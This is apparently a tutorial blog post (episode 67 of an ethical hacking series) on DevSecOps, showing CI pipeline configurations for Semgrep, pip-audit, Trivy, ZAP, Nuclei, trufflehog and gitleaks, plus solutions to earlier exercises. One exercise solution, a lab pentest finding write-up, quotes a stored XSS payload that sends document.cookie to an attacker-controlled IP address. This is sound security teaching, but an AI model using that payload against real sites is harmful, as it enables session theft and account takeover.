Learn Ethical Hacking (#67) - Continuous Security - DevSecOps and Pipeline Security

@scipio 70

about 10 hours ago

StemSocial

Learn Ethical Hacking (#67) - Continuous Security - DevSecOps and Pipeline Security

What will I learn

What DevSecOps means and why "shift left" is more than a buzzword;
Security in CI/CD pipelines -- integrating SAST, DAST, SCA, and secret scanning into builds;
SAST (Static Application Security Testing) -- finding vulnerabilities in source code before deployment;
DAST (Dynamic Application Security Testing) -- testing running applications for vulnerabilities;
SCA (Software Composition Analysis) -- tracking and scanning third-party dependencies;
Infrastructure scanning -- tfsec, Checkov, and kube-bench in the deployment pipeline;
Security gates -- when to block deployments and when to alert;
Defense: building a security-aware development culture, not a security bottleneck.

Requirements

A working modern computer running macOS, Windows or Ubuntu;
Familiarity with CI/CD concepts (GitHub Actions, GitLab CI, or Jenkins);
Understanding of IaC security from Episode 38;
The ambition to learn ethical hacking and security research.

Difficulty

Intermediate

Curriculum (of the `Learn Ethical Hacking Series`):

Learn Ethical Hacking (#67) - Continuous Security - DevSecOps and Pipeline Security

Solutions to Episode 66 Exercises

Exercise 1: Full finding write-up (abbreviated).

Title: Stored XSS in User Profile Display Name
Severity: High (CVSS 7.6 -- AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N)
Affected: https://dvwa.lab/vulnerabilities/xss_s/

Description: The user profile "Name" field does not sanitize
HTML/JavaScript input. A stored XSS payload persists in the
database and executes in any user's browser that views the profile.

Business Impact: An attacker can steal session cookies of any
user (including administrators) who views the attacker's profile,
enabling full account takeover.

Evidence: [screenshot of Burp request with payload
  <script>document.location='http://10.10.14.5/steal?c='+document.cookie</script>
  and screenshot of cookie received on attacker's netcat listener]

Reproduction: 1. Log in as low-privilege user. 2. Navigate to
profile settings. 3. Enter XSS payload in Name field. 4. Save.
5. Log in as admin and view the user's profile. 6. Admin session
cookie is sent to attacker's listener.

Remediation: HTML-encode all user input on output. Implement
Content-Security-Policy header with script-src 'self'.

The reproduction steps are the part most people get lazy about. Notice that every step is concrete and sequential -- a junior developer who has never heard of XSS can follow steps 1-6 and see exactly what happens. No "test the input field for XSS" hand-waving. The CVSS string encodes the full attack vector, and the business impact section does what we discussed in episode 66: translates the technical finding into consequences that a non-technical stakeholder actually cares about. The remediation section is specific to the technology (HTML encoding on output, not "fix the vulnerability"), and it includes a defense-in-depth layer (CSP header) in case the primary fix has gaps.

Exercise 2: Executive summary (abbreviated).

During the assessment of Apex Financial's customer portal
(May 12-16, 2026), our team identified 18 security vulnerabilities
including 2 Critical-severity issues that allow complete compromise
of the application and its underlying database.

An external attacker with no credentials can extract the full
customer database (estimated 200,000 records) and gain
administrative access to the server infrastructure. This represents
significant regulatory risk under GDPR and PCI DSS.

Overall Risk Rating: CRITICAL

Top 3 Recommendations:
1. Immediately patch the SQL injection in the login form (2-4 hours)
2. Implement multi-factor authentication for all user accounts
3. Engage a remediation sprint to address the 5 High-severity
   findings within 30 days

The key quality marker of this summary: zero jargon. No "SQL injection," no "POST endpoint," no "parameterized queries." The executive reads "an external attacker with no credentials can extract the full customer database" and understands the risk immediately. The recommendations include time estimates (which help the manager prioritize) and specific next steps (which prevent the summary from sitting in someone's inbox forever). If a non-technical board member reads this and cannot explain the risk in their own words, the summary needs rewriting -- as we discussed in episode 66, the executive summary is the most important section because it is the ONLY section most decision-makers will read.

Exercise 3: Ghostwriter setup and comparison (abbreviated).

Ghostwriter setup: Docker Compose on Ubuntu, 3 containers
  (Django app, PostgreSQL, Nginx). Initial setup: 15 minutes.
  Created project "Lab Pentest Q2 2026", added 3 findings from
  DVWA lab work (SQLi, stored XSS, broken auth).

Report generation: selected findings, chose PDF template,
  exported. Total time from blank project to finished PDF: 45 min.

Markdown + Pandoc comparison:
  Wrote same 3 findings in Markdown, ran pandoc with --toc.
  Total time: 35 minutes (faster for 3 findings).

BUT: Ghostwriter's finding library is the differentiator.
  After entering those 3 findings once, the NEXT engagement
  starts with pre-written SQLi/XSS/auth findings that only
  need endpoint-specific details filled in. By engagement #5,
  report creation time drops to ~20 minutes because 80% of
  common findings are already in the library.

Verdict: Markdown wins for solo operators doing <5 engagements/year.
  Ghostwriter wins for teams or anyone doing 10+ engagements --
  the finding library compounds in value over time.

This comparison highlights exactly the point from episode 66 about reporting tools: the value of a finding library is not visible on the first engagement. It only becomes clear after you have written the same "Blind SQL Injection" finding for the fifth time and realize that Ghostwriter lets you fill in the endpoint-specific details in 2 minutes instead of writing 3 paragraphs from scratch. The Markdown + Pandoc approach is simpler, faster to set up, and gives you full control -- but it does not scale across engagements because every report starts from zero. For the solo bug bounty hunter writing occasional reports, Pandoc is fine. For a pentest firm running multiple concurrent engagements, Ghostwriter (or PlexTrac, or Serpico) is not optional.

Episode 66 was about reporting and documentation -- the skill that separates pentesters who get hired once from pentesters who get hired back. We covered report structure (executive summary, methodology, findings, risk summary, appendices), the art of writing findings that actually drive remediation (CVSS scoring, business impact language, specific reproduction steps, actionable remediation), evidence standards, the multi-audience problem (executives want risk, managers want priorities, engineers want fix instructions), reporting tools (Ghostwriter, PlexTrac, Serpico, Markdown + Pandoc), and common mistakes that make reports useless. The closing argument was that individual pentest findings fix individual bugs, but trend analysis across engagements reveals the systemic weaknesses that organizations need to address at the process level.

Today we take that insight about systemic improvement and make it concrete. If the pentest report keeps finding SQL injection year after year, the problem is not the individual SQL injection -- it is the development process that allows SQL injection to reach production in the first place. The fix is not "patch this query." The fix is "make it impossible for this class of bug to survive the build pipeline." That is DevSecOps, and it is the subject of today's episode.

Shift Left -- What It Actually Means

Traditional security testing happens at the end. Build the application, deploy it to staging, hire a pentester, get the report, panic, fix things, deploy again. This is like building a house, moving in, and THEN checking if the foundation is cracked. If you find a critical issue, you tear down the house and start over. Expensive, slow, and frustrating for everyone involved.

Shift left means moving security testing earlier in the development lifecycle -- to the left on the typical development timeline diagram. Find the SQL injection during the code review, not during the annual pentest. Detect the hardcoded AWS credential in the pull request, not in the breach notification. Catch the vulnerable Log4j dependency at build time, not after the attacker has already used it to install a cryptominer on your production servers.

I want to be clear about what shift left is NOT: it is NOT replacing pentesting. It is ensuring that when the pentester finally arrives, they spend their time finding architectural flaws, business logic bugs, and complex attack chains -- the things that require human creativity and cannot be automated. If your pentester is spending three days finding SQL injections that a $0 open-source scanner would have caught in 30 seconds, you are wasting their time and your money. DevSecOps handles the commodity vulnerabilities automatically, so the humans can focus on the hard problems ;-)

The economics are brutal. IBM's "Cost of a Data Breach" report has consistently shown that a bug found in development costs roughly $80 to fix. The same bug found in testing costs $240. Found in production? $960. Found during a breach? Tens of thousands, sometimes millions. Shifting left is not just a security philosophy -- it is a financial argument that even the most budget-conscious CTO cannot ignore.

The DevSecOps Pipeline

Here is what a modern security-integrated pipeline looks like. Every stage adds a layer of automated security checking, and the code only reaches production if it survives all of them:

Developer writes code
       |
[PRE-COMMIT] -- Secret scanning (gitleaks, git-secrets)
       |
[CODE REVIEW] -- Peer review + security checklist
       |
[CI BUILD]
  |-- SAST (Semgrep, CodeQL) -- scan source code
  |-- SCA (Snyk, Dependabot, pip-audit) -- scan dependencies
  |-- IaC scan (tfsec, Checkov) -- scan Terraform/K8s manifests
  |-- Container scan (Trivy) -- scan Docker images
  |-- Secret scan (trufflehog) -- scan repo history
       |
[STAGING DEPLOY]
       |
[DAST] -- ZAP, Nuclei -- scan running application
       |
[SECURITY GATE] -- pass/fail based on findings
       |
[PRODUCTION DEPLOY]
       |
[CONTINUOUS MONITORING] -- runtime security, vulnerability alerts

Each layer catches a different class of problem. Pre-commit hooks prevent developers from accidentally committing API keys and database passwords (we covered leaked secrets on GitHub in episode 65 -- those leaks happen because there was no pre-commit guard). SAST catches code-level vulnerabilities like SQL injection and XSS patterns before anyone runs the code. SCA catches known-vulnerable dependencies -- the Log4Shell situation (episode 45 on supply chain attacks) would have been caught by any SCA tool that knew about CVE-2021-44228. DAST catches runtime issues that static analysis misses -- misconfigurations, missing security headers, authentication bypasses that only manifest when the application is actually running.

The critical insight is that no single layer catches everything. SAST finds SQL injection patterns in source code but cannot detect authentication logic flaws that only appear at runtime. DAST finds runtime issues but cannot tell you which line of code to fix. SCA knows about published CVEs but knows nothing about your custom code. The layers complement each other, and the combination provides coverage that none of them achieves alone.

SAST -- Finding Bugs in Source Code

SAST tools analyze your source code without executing it. They look for patterns that match known vulnerability types -- string concatenation in SQL queries (SQL injection), unsanitized user input rendered in HTML (XSS), use of deprecated cryptographic functions (weak crypto), hardcoded credentials, and hundreds more.

# GitHub Actions: Semgrep SAST scan
name: Security Scan
on: [push, pull_request]

jobs:
  sast:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Semgrep Scan
        uses: returntocorp/semgrep-action@v1
        with:
          config: >-
            p/security-audit
            p/owasp-top-ten
            p/python

That is 12 lines of YAML to get automated vulnerability scanning on every push and every pull request. Twelve lines. There is genuinely no excuse for not having this in every repository that touches the internet.

# Semgrep command-line usage (local development)
semgrep --config "p/owasp-top-ten" --config "p/security-audit" ./src/

# Example findings:
# src/auth.py:47 -- sql-injection
#   cursor.execute(f"SELECT * FROM users WHERE name='{name}'")
#   Fix: use parameterized query
#
# src/views.py:123 -- xss
#   return HttpResponse(f"<h1>Welcome {username}</h1>")
#   Fix: use Django template engine with auto-escaping

# CodeQL (GitHub's SAST engine)
# Configured via .github/codeql/codeql-config.yml
# Runs automatically on GitHub repos with Advanced Security enabled
# Deeper data-flow analysis than Semgrep but slower (minutes vs seconds)

SAST tools comparison:

Semgrep:    fast, pattern-based, great custom rules, open-source
CodeQL:     deep data-flow analysis, GitHub-integrated, query language
Bandit:     Python-specific, simple, good for quick checks
SonarQube:  comprehensive, multi-language, dashboard-focused
Checkmarx:  enterprise, commercial, very thorough but expensive

Start with: Semgrep for immediate value (free, fast, good defaults)
Add CodeQL if on GitHub (free for public repos, included in GHAS)

Semgrep deserves special attention because it has fundamentally changed the SAST landscape. Traditional SAST tools (Checkmarx, Fortify, Veracode) are expensive, slow, and produce enormous numbers of false positives. Semgrep is open-source, runs in seconds (not hours), and its pattern-matching approach means the rules are readable -- you can look at a Semgrep rule and understand exactly what it is searching for. The community-maintained rulesets (p/owasp-top-ten, p/security-audit) cover the most common vulnerability patterns across Python, JavaScript, Java, Go, Ruby, and more. You can also write custom rules specific to your codebase in about 10 minutes -- if your application has a custom execute_query() function that should always use parameterized inputs, you write a Semgrep rule that flags any call to execute_query() with string concatenation.

CodeQL goes deeper. Where Semgrep matches syntactic patterns (it sees f"SELECT * FROM ... {var}" and flags it), CodeQL performs data-flow analysis -- it traces where user input enters the application (a "source") and where it reaches a dangerous function (a "sink"), even across multiple function calls and file boundaries. This means CodeQL catches vulnerabilities that Semgrep misses: cases where user input passes through three helper functions before reaching the SQL query, or where a configuration value loaded from a user-controlled file eventually ends up in an os.system() call. The tradeoff is speed -- CodeQL builds a full semantic database of your codebase and queries it, which takes minutes rather than seconds.

Having said that, SAST tools have a fundamental limitation: they cannot understand business logic. A SAST scanner will never tell you "this discount calculation can be manipulated by adding items and removing them in a specific order" (episode 22, business logic flaws). They find code-level patterns, not application-level reasoning. This is why SAST complements pentesting rather than replacing it.

SCA -- Scanning Dependencies

Your application is 10% your code and 90% other people's code. Those dependencies have vulnerabilities too, and new CVEs are published daily. SCA tools track your dependencies and alert you when a known vulnerability affects one of them.

# GitHub Actions: dependency scanning
jobs:
  sca:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      # Python
      - name: pip-audit
        run: pip install pip-audit && pip-audit -r requirements.txt --format json

      # Node.js
      - name: npm audit
        run: npm audit --json

      # Container images
      - name: Trivy
        uses: aquasecurity/trivy-action@master
        with:
          image-ref: 'myapp:latest'
          severity: 'CRITICAL,HIGH'
          exit-code: '1'  # fail the build on critical/high findings

# Manual SCA scanning

# Python
pip-audit
# Found 3 vulnerabilities:
#   requests 2.25.0 -- CVE-2023-32681 (High)
#   urllib3 1.26.5 -- CVE-2023-43804 (Medium)

# Node.js
npm audit
# 2 critical, 5 high, 12 moderate vulnerabilities

# Go
govulncheck ./...

# Container image scanning
trivy image myapp:latest
# Total: 147 (CRITICAL: 3, HIGH: 12, MEDIUM: 45, LOW: 87)

The container scanning numbers are worth talking about. 147 vulnerabilities in a single Docker image sounds terrifying, but context matters. Most of those are in base OS packages that your application never calls -- a vulnerable version of libxml2 in the Ubuntu base image is only exploitable if your application actually parses untrusted XML using the system library. The CRITICAL and HIGH findings are what you act on immediately (and those 15 findings typically include things like OpenSSL vulnerabilities that DO affect your application's TLS handling).

The real power of SCA is continuous monitoring. GitHub's Dependabot, Snyk, and similar tools do not just scan once -- they monitor your dependency tree continuously and open pull requests automatically when a new CVE is published that affects one of your dependencies. This matters because vulnerabilities are disclosed on a schedule that has nothing to do with YOUR release cycle. A critical OpenSSL CVE published on a Tuesday afternoon needs to be addressed whether or not you had a sprint planned. Automated dependency PRs mean your team sees the vulnerability, the fix, and the test results in one place, and can merge the update in minutes instead of spending hours researching which dependency version to bump.

Remember episode 45 on supply chain attacks? SCA is the primary defense against the exact attack vectors we discussed there. A typosquatted npm package, a compromised PyPI dependency, a backdoored GitHub Action -- SCA tools maintain databases of known malicious packages and will flag them before they reach your production environment. Not perfect (zero-day supply chain attacks bypass SCA by definition), but it catches the vast majority of known threats.

DAST -- Testing Running Applications

SAST looks at code. DAST looks at the running application from the outside -- exactly like a pentester would, but automated. It sends HTTP requests, analyzes responses, and identifies vulnerabilities that only manifest at runtime.

# GitHub Actions: ZAP DAST scan against staging
jobs:
  dast:
    runs-on: ubuntu-latest
    steps:
      - name: ZAP Baseline Scan
        uses: zaproxy/[email protected]
        with:
          target: 'https://staging.myapp.com'
          rules_file_name: '.zap/rules.tsv'
          cmd_options: '-a'

      - name: Nuclei Scan
        run: |
          nuclei -u https://staging.myapp.com \
            -t cves/ -t vulnerabilities/ \
            -severity critical,high \
            -o nuclei-results.txt

SAST vs DAST -- when to use each:

SAST (white-box): sees the source code
  Pro: finds bugs early, specific file + line number
  Con: false positives, cannot find runtime configuration issues
  Finds: SQLi patterns, XSS sinks, hardcoded secrets

DAST (black-box): tests the running application
  Pro: finds real exploitable vulnerabilities (low false positive rate)
  Con: late in the pipeline, cannot pinpoint code location
  Finds: SQLi (confirms exploitable), XSS (confirms in browser),
         missing headers, misconfigurations, auth bypass

Use BOTH. SAST catches 80% of code bugs early and cheap.
DAST catches the 20% that SAST misses -- runtime config issues,
logic flaws that only appear when components interact, and
chained vulnerabilities that static analysis cannot model.

The SAST vs DAST distinction maps directly to the testing philosophy we discussed across multiple episodes. SAST is like reading the blueprint of a lock (you can spot design flaws). DAST is like actually trying to pick the lock (you discover whether it opens). A SQL injection pattern in source code is a SAST finding -- it looks vulnerable. The same SQL injection confirmed exploitable by an automated ZAP scan is a DAST finding -- it IS vulnerable. Both are valuable, at different stages of the pipeline.

ZAP (Zed Attack Proxy) is the most widely used open-source DAST tool. It spiders the application to discover all endpoints, then runs active scan rules against each one -- testing for SQL injection, XSS, directory traversal, insecure headers, and dozens of other vulnerability classes. The "baseline scan" mode (used in the GitHub Actions example above) is the lightweight version: it checks for passive issues (missing security headers, cookie flags, information disclosure) without sending active attack payloads. The full scan sends actual attack payloads and takes longer but finds more. For a CI/CD pipeline, the baseline scan on every PR and the full scan on a weekly schedule is a reasonable balance between thoroughness and speed.

Nuclei complements ZAP by running template-based checks -- thousands of community-contributed templates that test for specific CVEs, known misconfigurations, default credentials, exposed admin panels, and technology-specific vulnerabilities. Where ZAP is a generic web vulnerability scanner, Nuclei is more like "run 5,000 specific checks that the community has written templates for." The combination of ZAP (broad coverage) and Nuclei (specific checks) provides comprehensive DAST coverage.

Security Gates -- The Hard Decision

This is where DevSecOps gets political. You have automated tools finding vulnerabilities. The question is: what do you DO with the findings?

The hardest DevSecOps decision: when do you BLOCK a deployment?

Aggressive gates (high security, slow velocity):
  Block on: any Critical or High finding
  Result: developers fix everything before deploying
  Risk: teams circumvent gates, frustration, shadow deployments

Permissive gates (low security, fast velocity):
  Block on: nothing (alert only)
  Result: fast deployments, vulnerabilities reach production
  Risk: breaches, compliance failures, audit findings

Balanced approach (recommended):
  BLOCK on:
  - Critical SAST findings (SQLi, RCE, hardcoded secrets)
  - Critical SCA findings (known exploited vulnerabilities)
  - Failed secret scanning (credentials in code)

  ALERT on (but do not block):
  - High/Medium SAST findings
  - High SCA findings without known exploits
  - DAST findings (require human investigation)

  IGNORE:
  - Informational findings
  - Low-severity SCA (no known exploit, theoretical risk)

The goal: block the things that DEFINITELY cause breaches.
Alert on the things that MIGHT cause breaches.
Ignore the noise.

The balanced approach works because it respects the development team's velocity while drawing hard lines around the vulneabilities that actually get exploited in the real world. A hardcoded AWS key in source code (blocked) is qualitatively different from a Medium-severity information disclosure header (alerted). One leads to account compromise within hours of pushing to a public repo. The other is a best-practice issue that should be fixed but does not justify stopping a deployment.

The biggest mistake organizations make with security gates is starting aggressive and then giving up. They block every PR on any finding, developers spend 40% of their time fighting false positives and overriding gates, frustration builds, and eventually someone with admin access disables the gates entirely "until we sort this out" (which means forever). The balanced approach avoids this death spiral by only blocking on findings that EVERYONE agrees should never reach production. Once the team trusts the gates (because the gates are not crying wolf every other commit), you can gradually tighten the thresholds.

Putting It All Together -- A Complete Pipeline

# Complete GitHub Actions security pipeline
name: Security Pipeline
on:
  push:
    branches: [main]
  pull_request:
    branches: [main]

jobs:
  secrets:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with: { fetch-depth: 0 }
      - name: Secret Scan
        uses: trufflesecurity/trufflehog@main
        with:
          extra_args: --only-verified

  sast:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: returntocorp/semgrep-action@v1
        with:
          config: p/security-audit p/owasp-top-ten

  sca:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: pip install pip-audit && pip-audit -r requirements.txt
      - uses: aquasecurity/trivy-action@master
        with:
          scan-type: 'fs'
          severity: 'CRITICAL,HIGH'
          exit-code: '1'

  iac:
    runs-on: ubuntu-latest
    if: contains(github.event.head_commit.modified, 'terraform')
    steps:
      - uses: actions/checkout@v4
      - name: tfsec
        uses: aquasecurity/[email protected]

Notice that all four jobs run in parallel. The secrets, sast, sca, and iac jobs have no dependencies on each other, so GitHub Actions runs them concurrently. A pipeline that runs four security scans in 90 seconds (parallel) instead of 6 minutes (sequential) is a pipeline that developers do not complain about. Speed matters -- not because security is less important than velocity, but because a slow pipeline that developers bypass is worse than a fast pipeline that actually runs on every commit.

The trufflehog --only-verified flag deserves attention. Trufflehog finds high-entropy strings in git history that look like secrets (API keys, tokens, passwords). Without --only-verified, it reports everything that LOOKS like a secret, which includes base64-encoded test data, UUIDs, and random strings that are not actually credentials. With --only-verified, it attempts to verify each potential secret against the corresponding service (AWS, GitHub, Slack, etc.) and only reports the ones that are actually valid and active. This dramatically reduces false positives -- you go from "50 potential secrets" to "3 verified active credentials" which is a much more actionable result.

The IaC scanning job only runs when Terraform files are modified (if: contains(..., 'terraform')). This is a practical optimization -- there is no point scanning infrastructure code on commits that only change Python application code. The tfsec tool (now part of Trivy) checks Terraform configurations for security misconfigurations: publicly accessible S3 buckets, security groups with 0.0.0.0/0 ingress, unencrypted databases, IAM policies that are too permissive. We covered these IaC security issues in detail in episode 38.

Pre-Commit Hooks -- The First Line of Defense

Before code even reaches the CI pipeline, pre-commit hooks can catch the most dangerous mistakes locally on the developer's machine:

# Install gitleaks for local secret scanning
brew install gitleaks  # macOS
# or download from github.com/gitleaks/gitleaks/releases

# .pre-commit-config.yaml
# repos:
#   - repo: https://github.com/gitleaks/gitleaks
#     rev: v8.18.0
#     hooks:
#       - id: gitleaks

# Test it: try to commit a file containing an AWS key
echo 'AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY' > test.env
git add test.env
git commit -m "oops"
# gitleaks: ERROR: AWS secret found in test.env:1
# commit blocked!

The beauty of pre-commit hooks is that the feedback loop is immediate. The developer types git commit, the hook runs in less than a second, and the commit is blocked before the secret ever enters git history. Compare this to discovering the leaked secret via trufflehog in CI (minutes later) or via GitHub's secret scanning alerts (hours later) or via an attacker using the key (days or weeks later). Earlier is always cheaper and safer.

Defense: Building a Security Culture That Actually Works

DevSecOps fails when it is imposed top-down. It succeeds when
developers adopt it because it makes their lives easier.

What works:
1. Make security tools FAST (Semgrep takes seconds, not hours)
2. Provide CLEAR remediation (not just "vulnerability found" --
   show the exact code change needed)
3. Security champions in every team (peers, not police)
4. Blameless post-mortems (learn from incidents, don't punish)
5. Developer-friendly tools (IDE plugins, PR comments, not
   separate portals that nobody checks)
6. Celebrate fixes (public acknowledgment of security improvements)

What fails:
1. Blocking every PR with security findings (frustration -> bypass)
2. Requiring security team approval for every deployment (bottleneck)
3. Using tools with 90% false positive rates (alert fatigue -> ignore)
4. Treating security as someone else's problem ("not my job")
5. Annual security training instead of continuous feedback (forgotten)

Point 3 deserves emphasis because it connects to something we covered in episode 46 (why security training fails). Alert fatigue is the single biggest killer of DevSecOps programs. If your SAST tool fires 200 warnings on every build and 180 of them are false positives, developers learn to ignore ALL findings -- including the 20 that are real vulnerabilities. The solution is not "force developers to review all 200" -- the solution is to tune the tool until its false positive rate is under 10%, so that every finding it reports is worth investigating. Semgrep's popularity is largely built on this principle: its pattern-matching approach has inherently lower false positive rates than traditional data-flow SAST tools, because it only reports patterns it is SURE about.

The security champion model is the most effective organizational pattern I have seen for sustainable DevSecOps adoption. Instead of a central security team that reviews every PR (bottleneck), you train one developer per team to be the "security champion" -- someone who understands the OWASP Top 10, knows how to read SAST findings, and can make security decisions within their team without waiting for the security department. The champion is not a full-time security person -- they are a developer who happens to have security expertise, embedded in the team that writes the code. This distributes security knowledge across the organization instead of concentrating it in a team that becomes a bottleneck. As a part from the organizational benefits, it also builds a pipeline of developers who might eventually want to move into security full-time.

The AI Slop Connection

AI is being integrated into DevSecOps pipelines in ways that range from genuinely useful to actively dangerous. On the useful end, AI-powered triage can analyze 500 SAST findings and identify the 15 that are actually exploitable. This is where AI adds real value -- not in finding vulnerabilities (SAST tools already do that) but in separating signal from noise. A human analyst spending 2 hours reviewing 500 findings to identify the 15 real ones is expensive. An AI model that achieves 90% accuracy on that triage task in 30 seconds frees the human to focus on the findings that matter.

On the dangerous end, AI-generated remediation advice can be wrong in subtle ways that are worse than no advice at all. An AI that suggests "add input validation" for a SQL injection finding might recommend client-side JavaScript validation (completely useless against an attacker who sends raw HTTP requests, as we covered in episode 12) instead of server-side parameterized queries (the actual fix). A developer who trusts the AI suggestion without understanding the vulnerability is trading one form of insecurity for another -- they think they fixed the bug, the CI pipeline no longer flags it (because the AI's suggested code pattern does not match the SAST rule), but the vulnerability is still exploitable.

The broader risk is that AI-generated code is particularly susceptible to the vulnerabilities that DevSecOps pipelines are designed to catch. AI models trained on GitHub data have seen millions of insecure code examples -- cursor.execute(f"SELECT * FROM users WHERE name='{name}'") appears far more often in training data than the secure parameterized version, simply because there is more insecure code in the world than secure code. Running SAST against AI-generated code is therefore not optional -- it is the minimum viable quality gate for code that was written by a system optimized for "looks correct" rather than "is secure."

Exercises

Exercise 1: Set up a complete security pipeline for a sample application. Use a simple Python/Flask or Node.js/Express app. Configure: (a) pre-commit hooks with gitleaks for secret scanning, (b) a Semgrep SAST scan in CI (use the GitHub Actions example from this episode or an equivalent GitLab CI / local script), (c) pip-audit or npm-audit for SCA dependency scanning, (d) Trivy for container scanning if your app uses Docker. Then introduce 3 deliberate vulnerabilities: a SQL injection (string concatenation in a query), a hardcoded API key in a config file, and a dependency with a known CVE (e.g. requests==2.25.0 for Python). Run the full pipeline and verify it catches all 3. Document which tool caught which vulnerability and at which pipeline stage. Save to ~/lab-notes/devsecops-pipeline.md.

Exercise 2: Compare 3 SAST tools against the same deliberately vulnerable codebase. Use DVWA source code, Juice Shop, or WebGoat as your target. Run Semgrep (with p/owasp-top-ten config), Bandit (for Python targets) or ESLint-security (for Node targets), and CodeQL (if on GitHub) or SonarQube Community Edition. Document per tool: (a) total findings, (b) unique findings (vulnerabilities only this tool found), (c) false positive count (findings you manually verified are not real vulnerabilities), (d) scan time. Calculate the overlap: what percentage of real vulnerabilities were found by 2+ tools? Save to ~/lab-notes/sast-comparison.md.

Exercise 3: Design a security gate policy for a fictional company with 50 developers and 10 microservices. Define: (a) what blocks a deployment (by finding type and severity), (b) what generates alerts but allows deployment to proceed, (c) what is suppressed/ignored, (d) the exception process (when a blocked finding must be deployed anyway -- who approves, what documentation is required, what is the SLA for remediation after the exception), (e) remediation SLAs by severity (Critical: X hours, High: X days, Medium: X weeks, Low: X quarter). Present it as a 1-page policy document that a development team lead would actually read and follow. Save to ~/lab-notes/security-gate-policy.md.

Bedankt en tot de volgende keer!

@scipio

stem stemsocial steemstem security programming

0.000

0 comments

Learn Ethical Hacking (#67) - Continuous Security - DevSecOps and Pipeline Security

Learn Ethical Hacking (#67) - Continuous Security - DevSecOps and Pipeline Security

What will I learn

Requirements

Difficulty

Curriculum (of the Learn Ethical Hacking Series):

Learn Ethical Hacking (#67) - Continuous Security - DevSecOps and Pipeline Security

Solutions to Episode 66 Exercises

Shift Left -- What It Actually Means

The DevSecOps Pipeline

SAST -- Finding Bugs in Source Code

SCA -- Scanning Dependencies

DAST -- Testing Running Applications

Security Gates -- The Hard Decision

Putting It All Together -- A Complete Pipeline

Pre-Commit Hooks -- The First Line of Defense

Defense: Building a Security Culture That Actually Works

The AI Slop Connection

Exercises

Bedankt en tot de volgende keer!

Curriculum (of the `Learn Ethical Hacking Series`):